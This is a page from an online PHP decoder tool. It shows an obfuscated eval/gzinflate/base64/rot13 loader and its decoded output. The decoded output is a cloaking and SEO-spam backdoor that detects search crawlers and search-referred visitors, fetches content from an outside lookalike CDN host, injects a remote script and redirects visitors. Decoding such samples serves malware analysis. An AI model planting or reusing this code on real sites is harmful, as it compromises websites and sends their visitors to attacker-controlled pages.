Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php eval(gzinflate(base64_decode(str_rot13('aEtWp9cT968bUb+OPo6j3GU2EmZLOZvItLwQZJyTf5V..

Decoded Output download

set_time_limit(0); error_reporting(0); define('VERSION', 'VCETE'); define('APIVERSION', '3'); define('API', base64_decode('aHR0cHM6Ly9jZG4uY2xvdWRmbGFyZWJyLmNvbS8=')); define('API_HTTP', base64_decode('aHR0cDovL2Nkbi5jbG91ZGZsYXJlYnIuY29tLw==')); define('API_JS', base64_decode('PHNjcmlwdCBhc3luYyBzcmM9Imh0dHBzOi8vYnIuZ29vZ2xlZXBsYXkuY29tL211bHVmYS5qcyI+PC9zY3JpcHQ+')); define('FALLBACK_REDIRECT_HTML', base64_decode('PGh0bWw+CiAgICA8aGVhZD4KICAgICAgICA8dGl0bGU+VGhlIHJlc291cmNlIGNhbm5vdCBiZSBmb3VuZC48L3RpdGxlPgogICAgICAgIDxzY3JpcHQ+d2luZG93LmxvY2F0aW9uPSJodHRwczovL2JyLmdvb2dsZWVwbGF5LmNvbS9mYS5odG1sIjs8L3NjcmlwdD4KICAgIDwvaGVhZD4KICAgIDxib2R5PgogICAgICAgIDxoMT5Ob3QgRm91bmQ8L2gxPgogICAgPC9ib2R5Pgo8L2h0bWw+')); $req_ref = $_SERVER["HTTP_REFERER"]; $req_ua = $_SERVER["HTTP_USER_AGENT"]; $host = $_SERVER['HTTP_HOST']; $req_uri = $_SERVER['REQUEST_URI']; function is_prefix($uri, $prefix_regex = '/[?\/](app|ios|android|download|blank|bet|casino|games|play|video|poker|root|news|patt|tee|sto|bea|slo|bac|pac|tig|bmw|fru|bull|card|gods|fish|mahj|uri|bak\.php)./') { return preg_match($prefix_regex, $uri) === 1; } function is_crawler($ua) { $crawlers = array('Googlebot', 'Bingbot', 'MSNBOT', 'Yahoo!'); foreach ($crawlers as $c) { if (stripos($ua, $c) !== false) { return true; } } return false; } function is_visitor($ref) { if (substr($ref, 0, 4) === 'http') { $refs = array('google.', 'bing.', 'yahoo.'); foreach ($refs as $r) { if (stripos($ref, $r) !== false) { return true; } } } return false; } function get_content($url, $headers = array(), $conn_timeout = 0, $trans_timeout = 0) { if (function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]); curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_REFERER"]); curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $conn_timeout); curl_setopt($ch, CURLOPT_TIMEOUT, $trans_timeout); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $result = curl_exec($ch); if ($result == NULL) { return file_get_contents($url); } curl_close($ch); return $result; } else { return file_get_contents($url); } } function get_client_ip() { foreach (array('HTTP_CLIENT_IP', 'HTTP_X_REAL_IP', 'HTTP_CF_CONNECTING_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach (explode(',', $_SERVER[$key]) as $ip) { $ip = trim($ip); if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } function main() { global $req_ref, $req_ua, $host, $req_uri; header('Cache-Control: no-store, no-cache, must-revalidate'); header('Cache-Control: post-check=0, pre-check=0', FALSE); header('Pragma: no-cache'); $uri_encoded = urlencode($req_uri); $headers = array(); if (isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])) { $lang = $_SERVER['HTTP_ACCEPT_LANGUAGE']; array_push($headers, "Accept-Language: $lang"); array_push($headers, "Vary: Accept-Language"); } if (is_crawler($req_ua)) { $crawler_ip = get_client_ip(); if (is_prefix($req_uri)) { header('Content-Type:text/html; charset=utf-8'); $htmls = get_content(API . "connector.html?domain={$host}&uri={$uri_encoded}&ip={$crawler_ip}&ver=" . VERSION . "&v=" . APIVERSION, $headers); $htmls = str_replace('</head>', API_JS . '</head>', $htmls); echo $htmls; exit; } else { echo file_get_contents(API . "suijiurl/index.php"); } } elseif (is_prefix($req_uri) && is_visitor($req_ref)) { header('Content-Type:text/html; charset=utf-8'); $client_ip = get_client_ip(); $allheaders = array(); if (!function_exists('getallheaders')) { function getallheaders() { $tmp_headers = array(); foreach ($_SERVER as $name => $value) { if (substr($name, 0, 5) == 'HTTP_') { $tmp_headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5)))))] = $value; } } return $tmp_headers; } $allheaders = getallheaders(); } else { $allheaders = getallheaders(); } foreach ($allheaders as $key => $value) { if (stripos($key, 'Sec-') === 0) { array_push($headers, "$key: $value"); } } $html = get_content(API . "redirectv2.html?domain={$host}&uri={$uri_encoded}&ip={$client_ip}&ver=" . VERSION . "&v=" . APIVERSION, $headers, 3, 3); $html = str_replace('</head>', API_JS . '</head>', $html); echo($html ? $html : FALLBACK_REDIRECT_HTML); exit; } } main();

Did this file decode correctly?

Original Code

<?php
eval(gzinflate(base64_decode(str_rot13('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'))));

Function Calls

gzinflate	1
str_rot13	1
base64_decode	1

Variables

None

Stats

MD5	1c0bc06d08ddb55bfad1c7297c0013ab
Eval Count	1
Decode Time	60 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats